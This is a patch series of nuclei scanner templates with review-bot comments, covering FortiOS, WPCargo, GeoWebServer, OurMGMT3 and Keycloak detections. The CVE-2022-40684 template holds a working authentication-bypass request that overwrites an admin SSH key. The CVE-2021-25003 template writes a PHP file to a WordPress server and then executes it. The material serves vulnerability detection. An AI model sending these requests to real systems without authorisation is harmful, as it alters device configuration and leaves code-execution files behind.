From daf2c4b584a763493b49dbc6d9ae51fe2167fa90 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Fri, 14 Oct 2022 18:55:27 -0500 Subject: [PATCH 01/27] Update fortios-panel.yaml the modified changes did not accurately reflect the intent of the merge request. put the details back to reflect the intent of the merge request. --- exposed-panels/fortinet/fortios-panel.yaml | 37 ++++++++++++++++------ 1 file changed, 27 insertions(+), 10 deletions(-) diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index a1d04af8d5..274c08f1e5 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -1,32 +1,49 @@ id: fortios-panel info: - name: FortiOs Exposed Panel + name: fortios-panel author: canberbamber severity: info + description: | + admin portal of fortios devices + reference: + - https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ metadata: verified: true shodan-query: http.favicon.hash:945408572 tags: panel,fortinet,fortios + requests: - - method: GET - path: - - "{{BaseURL}}/remote/login?lang=en" + - raw: + - | + GET /api/v2/cmdb/system/admin/admin HTTP/1.1 + Host: {{Hostname}}:{{port}} + Content-Type: application/x-www-form-urlencoded + + attack: clusterbomb + payloads: + port: + - 443 + - 8443 + - 10443 + - 80 + - 4443 + - 9443 + - 6443 + - 7443 matchers-condition: and matchers: - type: word + part: body words: - - "Please Login" - - "Launch FortiClient" - condition: and - + - '/remote/login' - type: word part: header words: - - "text/html" + - 'Server: xxxxxxxx-xxxxx' - type: status status: - - 200 + - 403 From ec53ac2a339bf76addf7e123e1cc05d849ada30b Mon Sep 17 00:00:00 2001 From: canberbamber Date: Fri, 14 Oct 2022 19:00:53 -0500 Subject: [PATCH 02/27] Update fortios-panel.yaml --- exposed-panels/fortinet/fortios-panel.yaml | 3 --- 1 file changed, 3 deletions(-) 
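Review bot: The `port` clusterbomb only rewrites the `Host:` header; as far as I can tell a nuclei raw request still connects to the host and port of the input URL, so the eight payloads send eight near-identical requests to the same socket and never reach 8443/10443/4443 etc. Port coverage belongs in the input list (or a prior port-scan step), not in a `Host: {{Hostname}}:{{port}}` payload, and the `Content-Type: application/x-www-form-urlencoded` header on a body-less GET is dead weight that can go with it. A panel check that hits `/api/v2/cmdb/system/admin/admin` will also be logged by targets as a CVE-2022-40684 probe; if the `Server: xxxxxxxx-xxxxx` header is returned for `GET /remote/login` as well, fingerprinting on that page is the quieter choice for an `info` template. The `description:` should at least state why the cmdb API path is used for detection.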
diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index 274c08f1e5..773f256a2a 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -20,7 +20,6 @@ requests: GET /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: {{Hostname}}:{{port}} Content-Type: application/x-www-form-urlencoded - attack: clusterbomb payloads: port: @@ -32,7 +31,6 @@ requests: - 9443 - 6443 - 7443 - matchers-condition: and matchers: - type: word @@ -43,7 +41,6 @@ requests: part: header words: - 'Server: xxxxxxxx-xxxxx' - - type: status status: - 403 From b71e1f55300ba98ac97fb05e232bd935a3940bb5 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 00:59:58 -0500 Subject: [PATCH 03/27] Update CVE-2022-40684.yaml fixed a metadata inconsistency. --- cves/2022/CVE-2022-40684.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 9e3673f294..c54235343e 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -13,7 +13,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-27593 + cve-id: CVE-2022-40684 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: From 129df6323c786acacd4e02017821b3067d2e7167 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 01:08:32 -0500 Subject: [PATCH 04/27] Update CVE-2022-40684.yaml added most common ports. --- cves/2022/CVE-2022-40684.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index c54235343e..17668b64b2 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml 
@@ -13,21 +13,21 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-40684 + cve-id: CVE-2022-27593 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: - raw: - | GET /api/v2/cmdb/system/admin HTTP/1.1 - Host: {{Hostname}} + Host: {{Hostname}}:{{port}} User-Agent: Node.js Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= X-Forwarded-Vdom: root - | PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}} + Host: {{Hostname}}:{{port}} User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; @@ -36,7 +36,17 @@ requests: { "ssh-public-key1":"{{randstr}}" } - + attack: clusterbomb + payloads: + port: + - 443 + - 8443 + - 10443 + - 80 + - 4443 + - 9443 + - 6443 + - 7443 stop-at-first-match: true req-condition: true matchers-condition: or From 51bc7f86d44372c835490eff8507a95383fa6505 Mon Sep 17 00:00:00 2001 From: canberbamber Date: Sat, 15 Oct 2022 01:09:35 -0500 Subject: [PATCH 05/27] Update CVE-2022-40684.yaml --- cves/2022/CVE-2022-40684.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 17668b64b2..746663f227 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -13,7 +13,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 classification: cvss-score: 9.6 - cve-id: CVE-2022-27593 + cve-id: CVE-2022-40684 tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev requests: From 14c8505192a15d743c0e45a58a4e3bb263c1c063 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 20 Oct 2022 06:25:04 +0530 Subject: [PATCH 06/27] Added template for CVE-2021-25003 --- cves/2021/CVE-2021-25003.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-25003.yaml 
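Review bot: This hunk reverts `cve-id` to `CVE-2022-27593`, the wrong identifier that the immediately preceding commit had just corrected, so the classification again disagrees with the template `id` and its references; keep `cve-id: CVE-2022-40684`. The added `{{port}}` payload only changes the `Host:` header — a raw request still connects to the port in the input URL — so the net effect is eight `PUT /api/v2/cmdb/system/admin/admin` configuration writes per host instead of one, with no additional ports reached. The `requests` block (its matchers) continues past the hunk.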
diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml new file mode 100644 index 0000000000..d77427b432 --- /dev/null +++ b/cves/2021/CVE-2021-25003.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-25003 + +info: + name: WPCargo < 6.9.0 - Unauthenticated RCE + author: theamanrawat + severity: critical + description: | + The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE. + reference: + - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a + - https://wordpress.org/plugins/wpcargo/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 + classification: + cve-id: CVE-2021-25003 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" + - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200" + - "contains(body_2, 'PNG')" + condition: and \ No newline at end of file From 396af19348c0854304e7e36b6ce3a2dbe0898c6a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Oct 2022 13:12:32 +0530 Subject: [PATCH 07/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index d77427b432..29206d3044 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml 
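Review bot: The matcher proves that the written file is served back, not that PHP executed it: `contains(body_2, 'PNG')` is satisfied by the raw barcode image that `barcode.php` wrote into `{{randstr}}.php`, so a host that serves the file as a static download (or any catch-all 200 page containing the text `PNG`) matches, while the `?1=system` argument is never exercised. Assert on an effect of execution instead, e.g. call the dropped file with a harmless function and a unique value and match on its echo, such as `?1=var_dump` with a POST body `2={{md5(num)}}` and `contains(body_2, md5(num))`. The write also leaves `{{randstr}}.php` on the target permanently, and from the `?1=system` usage it appears to act as an unauthenticated code-execution endpoint; the `description:` should say so and a cleanup step is needed before this is shipped to a scanner audience.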
@@ -14,18 +14,20 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauth requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + req-condition: true matchers: - type: dsl dsl: + - "contains(all_headers_1, 'Content-Length: 0')" - "status_code_1 == 200" - "status_code_2 == 200" - "contains(body_2, 'PNG')" - condition: and \ No newline at end of file + condition: and From 0bdd0fa3ba98f584dabc5a87a61d4b5f552f35f9 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Sat, 22 Oct 2022 13:55:04 +0530 Subject: [PATCH 08/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 29206d3044..ff5af41d9f 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml 
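Review bot: `contains(all_headers_1, 'Content-Length: 0')` is a brittle signal for "the write succeeded": a server using chunked transfer encoding omits the header, a proxy or PHP front-end may add a body, and an HTTP/2 hop lower-cases header names so the literal `Content-Length` will not match. Since the second request already observes the dropped file, this condition mostly adds false negatives; drop it, or if a first-response check is wanted, use a tolerant form such as `len(body_1) == 0`. The `requests` block and its first path continue outside the hunk.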
@@ -14,20 +14,29 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauth + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + +variables: + num: "99999999" requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php" - - "{{BaseURL}}/wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=system" + - raw: + - | + GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 2={{md5(num)}} req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_1, 'Content-Length: 0')" - "status_code_1 == 200" - "status_code_2 == 200" - - "contains(body_2, 'PNG')" + - "contains(body_2, md5(num))" condition: and From 8328251daf64622ca446e485a2a118817c7b890d Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Sat, 22 Oct 2022 13:55:43 +0530 Subject: [PATCH 09/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index ff5af41d9f..1ba741ec5d 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml 
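Review bot: The tag line regresses: `wpcargo,unauth` from the previous commit is replaced by `html2wp,unauthenticated` again, which names the wrong plugin and reintroduces the non-standard `unauthenticated` tag; keep `tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauth`. Switching to `?1=var_dump` with `2={{md5(num)}}` and `contains(body_2, md5(num))` is the right way to confirm execution rather than file presence. To rule out a page that merely reflects the POST body, also require the `var_dump` framing, e.g. `- "contains(body_2, 'string(32)')"`, which is what `var_dump` of a 32-character string emits.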
@@ -14,7 +14,7 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,html2wp,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated variables: num: "99999999" From 29a6e32142f87eded2772330dce05a89cf8a82d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Oct 2022 11:52:41 +0530 Subject: [PATCH 10/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 1ba741ec5d..7ed9b17282 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -16,7 +16,7 @@ info: verified: true tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated -variables: +variables: num: "99999999" requests: From ee96ef48ad183eec41802b71b9d53a11f1e710e2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Oct 2022 19:57:41 +0530 Subject: [PATCH 11/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 7ed9b17282..3044be9cf5 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25003 info: - name: WPCargo < 6.9.0 - Unauthenticated RCE + name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution author: theamanrawat severity: critical description: | @@ -14,10 +14,10 @@ info: cve-id: CVE-2021-25003 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpscan,wpcargo,unauthenticated + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,wpcargo,unauth variables: - num: "99999999" + num: "999999999" requests: - raw: 
@@ -39,4 +39,5 @@ requests: - "status_code_1 == 200" - "status_code_2 == 200" - "contains(body_2, md5(num))" + - "contains(body_2, 'PNG')" condition: and From 29618ff571c6fc67e7370ff70489903dc559007f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 28 Oct 2022 14:45:14 +0700 Subject: [PATCH 12/27] feat: added version detection geowebserver --- .../{geo-webserver.yaml => geowebserver-detect.yaml} | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) rename technologies/{geo-webserver.yaml => geowebserver-detect.yaml} (63%) diff --git a/technologies/geo-webserver.yaml b/technologies/geowebserver-detect.yaml similarity index 63% rename from technologies/geo-webserver.yaml rename to technologies/geowebserver-detect.yaml index 2b1ab6d373..1528249278 100644 --- a/technologies/geo-webserver.yaml +++ b/technologies/geowebserver-detect.yaml @@ -1,10 +1,11 @@ -id: geo-webserver +id: geowebserver-detect info: name: GeoWebServer Detector - author: dhiyaneshDK + author: dhiyaneshDK,daffainfo severity: info metadata: + verified: true shodan-query: http.title:"GeoWebServer" tags: panel,geowebserver @@ -22,3 +23,10 @@ requests: - type: word words: - "GeoWebServer" + + extractors: + - type: regex + part: header + group: 1 + regex: + - 'Server: GeoWebServer ([0-9.]+)' From 6e967e2d466be9b521c1578d826bbbfdc83afef4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Oct 2022 17:54:21 +0530 Subject: [PATCH 13/27] Update geowebserver-workflow.yaml --- workflows/geowebserver-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/geowebserver-workflow.yaml b/workflows/geowebserver-workflow.yaml index 6d2adff08f..cb43d1e509 100644 --- a/workflows/geowebserver-workflow.yaml +++ b/workflows/geowebserver-workflow.yaml 
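Review bot: Renaming `technologies/geo-webserver.yaml` to `geowebserver-detect.yaml` leaves `workflows/geowebserver-workflow.yaml` pointing at the old path `technologies/geo-webserver.yaml`; the workflow reference should move in the same commit so the repository never carries a dangling template path. The new version extractor `Server: GeoWebServer ([0-9.]+)` is case-sensitive; if the header can arrive through an HTTP/2 or proxy hop that lower-cases header names, a `(?i)` prefix keeps it working. The template is now a `-detect` technology check but still carries `tags: panel,geowebserver`; `tech,geowebserver` would match its new role.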
@@ -6,6 +6,6 @@ info: description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target. workflows: - - template: technologies/geo-webserver.yaml + - template: technologies/geo-webserver-detect.yaml subtemplates: - - tags: geowebserver \ No newline at end of file + - tags: geowebserver From 9c2d4cc5c0f54ee68c3874252e624736c196bf65 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Oct 2022 17:55:26 +0530 Subject: [PATCH 14/27] Update and rename geowebserver-detect.yaml to geo-webserver-detect.yaml --- .../{geowebserver-detect.yaml => geo-webserver-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{geowebserver-detect.yaml => geo-webserver-detect.yaml} (95%) diff --git a/technologies/geowebserver-detect.yaml b/technologies/geo-webserver-detect.yaml similarity index 95% rename from technologies/geowebserver-detect.yaml rename to technologies/geo-webserver-detect.yaml index 1528249278..b40fea0ef5 100644 --- a/technologies/geowebserver-detect.yaml +++ b/technologies/geo-webserver-detect.yaml @@ -1,4 +1,4 @@ -id: geowebserver-detect +id: geo-webserver-detect info: name: GeoWebServer Detector From 022b1c79c209171dd5193ddcaa48d7a917ecc9a9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 4 Nov 2022 13:14:22 +0530 Subject: [PATCH 15/27] Create ourmgmt3-panel.yaml --- exposed-panels/ourmgmt3-panel.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/ourmgmt3-panel.yaml diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml new file mode 100644 index 0000000000..a3681dcce1 --- /dev/null +++ b/exposed-panels/ourmgmt3-panel.yaml 
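Review bot: The workflow is repointed at `technologies/geo-webserver-detect.yaml`, but the previous commit named the file `technologies/geowebserver-detect.yaml` (no hyphen), so at this commit the path does not exist and the workflow cannot load its first template. Either use the actual filename or rename the template in the same commit so both sides agree; a repository-level check that every `- template:` path in `workflows/` resolves would catch this class of mismatch.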
@@ -0,0 +1,26 @@ +id: ourmgmt3-panel + +info: + name: OurMGMT3 Admin Panel + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.title:"OurMGMT3" + tags: panel,ourmgmt3 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'OurMGMT3 Debug client' + + - type: status + status: + - 200 From 5af91e6aeb214c89cc4bfdc427f9c8766402bab8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 4 Nov 2022 13:15:57 +0530 Subject: [PATCH 16/27] Update ourmgmt3-panel.yaml --- exposed-panels/ourmgmt3-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/ourmgmt3-panel.yaml b/exposed-panels/ourmgmt3-panel.yaml index a3681dcce1..18a5db8b3a 100644 --- a/exposed-panels/ourmgmt3-panel.yaml +++ b/exposed-panels/ourmgmt3-panel.yaml @@ -12,8 +12,10 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/admin/login' + stop-at-first-match: true matchers-condition: and matchers: - type: word From 036b41d49b7fff81e22925494a5e6cc1ef5ea8f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Nov 2022 09:36:13 +0000 Subject: [PATCH 17/27] Auto Generated New Template Addition List [Fri Nov 4 09:36:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a25bae0cc2..af4e0b3ae3 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/labkey-server-login.yaml exposed-panels/nginx-admin-panel.yaml exposed-panels/nginx-ui-dashboard.yaml exposed-panels/nport-web-console.yaml +exposed-panels/ourmgmt3-panel.yaml exposed-panels/xiaomi-wireless-router-login.yaml exposed-panels/xnat-login.yaml misconfiguration/ampache-update-exposure.yaml From 5a33e1b9adbef49ca9a199ca3be30e0b6e1ac2b9 Mon Sep 17 00:00:00 2001 
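Review bot: The new template has no `description:` or `reference:` under `info`, so a user seeing a hit learns only the name `OurMGMT3 Admin Panel` and the string `OurMGMT3 Debug client` that matched. Add a one-line `description: OurMGMT3 admin login panel was detected.` and a `reference:` link to the product or the page the `Debug client` marker was taken from, so the match can be verified without re-running the scan.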
From: Prince Chaddha Date: Fri, 4 Nov 2022 15:38:24 +0530 Subject: [PATCH 18/27] Update CVE-2022-40684.yaml --- cves/2022/CVE-2022-40684.yaml | 16 +++------------- 1 file changed, 3 insertions(+), 13 deletions(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 746663f227..c54235343e 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -20,14 +20,14 @@ requests: - raw: - | GET /api/v2/cmdb/system/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Node.js Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= X-Forwarded-Vdom: root - | PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; @@ -36,17 +36,7 @@ requests: { "ssh-public-key1":"{{randstr}}" } - attack: clusterbomb - payloads: - port: - - 443 - - 8443 - - 10443 - - 80 - - 4443 - - 9443 - - 6443 - - 7443 + stop-at-first-match: true req-condition: true matchers-condition: or From 853044115dd88fccb4880721ce28c41222212355 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 15:50:51 +0530 Subject: [PATCH 19/27] Update fortios-panel.yaml --- exposed-panels/fortinet/fortios-panel.yaml | 21 ++++++--------------- 1 file changed, 6 insertions(+), 15 deletions(-) diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index 773f256a2a..0f530b480b 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -1,8 +1,8 @@ id: fortios-panel info: - name: fortios-panel - author: canberbamber + name: Fortios Exposed Panel + author: canberbamber,Jna1 severity: info description: | admin portal of fortios devices 
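Review bot: The second raw request is a real configuration write — `PUT /api/v2/cmdb/system/admin/admin` with `"ssh-public-key1":"{{randstr}}"` — so every scan of a vulnerable FortiOS device replaces the admin account's first SSH public key with a random string, and nothing in the template flags that. At minimum the `description:` should warn that the check modifies `system/admin/admin`, and unless `stop-at-first-match` already prevents the PUT once the read-only `GET /api/v2/cmdb/system/admin` matches (that depends on how `req-condition` evaluates the sequence, which I cannot confirm from here), the PUT should be gated so it is only reached when the GET is inconclusive. Reverting the Host-header port payload is correct: a raw request's destination comes from the input URL, not from `Host:`. The matchers for this request block continue past the hunk.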
@@ -18,29 +18,20 @@ requests: - raw: - | GET /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} - Content-Type: application/x-www-form-urlencoded - attack: clusterbomb - payloads: - port: - - 443 - - 8443 - - 10443 - - 80 - - 4443 - - 9443 - - 6443 - - 7443 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: body words: - '/remote/login' + - type: word part: header words: - 'Server: xxxxxxxx-xxxxx' + - type: status status: - 403 From f11260b883dd1d9e526422f8c09e702302f64188 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 16:10:17 +0530 Subject: [PATCH 22/27] Update key-cloak-admin-panel.yaml --- exposed-panels/key-cloak-admin-panel.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 3b757d7c18..e4bead4885 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -4,6 +4,9 @@ info: name: Keycloak Admin Panel author: incogbyte,righettod severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:-1105083093 tags: panel,keycloak requests: @@ -12,13 +15,18 @@ requests: - "{{BaseURL}}/auth/admin/master/console/" - "{{BaseURL}}/auth/admin" + stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word + part: body words: - "" - "keycloak" - part: body condition: or + + - type: status + status: + - 200 From 5c32b7ed3db2f9b8ec06dae37ab71bb18d9606e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 16:20:41 +0530 Subject: [PATCH 24/27] Update CVE-2021-25003.yaml --- cves/2021/CVE-2021-25003.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-25003.yaml b/cves/2021/CVE-2021-25003.yaml index 3044be9cf5..5e9a4530b1 100644 --- a/cves/2021/CVE-2021-25003.yaml +++ b/cves/2021/CVE-2021-25003.yaml 
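Review bot: Dropping the clusterbomb is right, but the panel check still requests `/api/v2/cmdb/system/admin/admin`, the exact endpoint of the CVE-2022-40684 exploit, so an `info`-severity panel scan is logged by the target as an exploitation attempt. If the `Server: xxxxxxxx-xxxxx` header is also returned for `GET /remote/login`, fingerprinting there with the same header and status matchers is the quieter choice; otherwise the `description:` should state why the API path is used. Word matchers are case-sensitive by default, so adding `case-insensitive: true` to the header matcher would survive a proxy that re-cases the `Server` header.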
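Review bot: As rendered, the body matcher's word list contains an empty string (`- ""`) next to `"keycloak"` under `condition: or`; an empty word is contained in every body, so that matcher is always true and the `200` status check becomes the only effective filter. If the empty string is an artefact of this rendering (for example an HTML tag that was stripped) ignore this, otherwise replace it with a concrete marker such as `- "Keycloak Administration Console"`. In the same rendering `- type: word` appears only as a removed line while `part: body` is added in its place; confirm the matcher still begins with `- type: word`, since without it the `matchers:` entry is no longer a valid list item.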
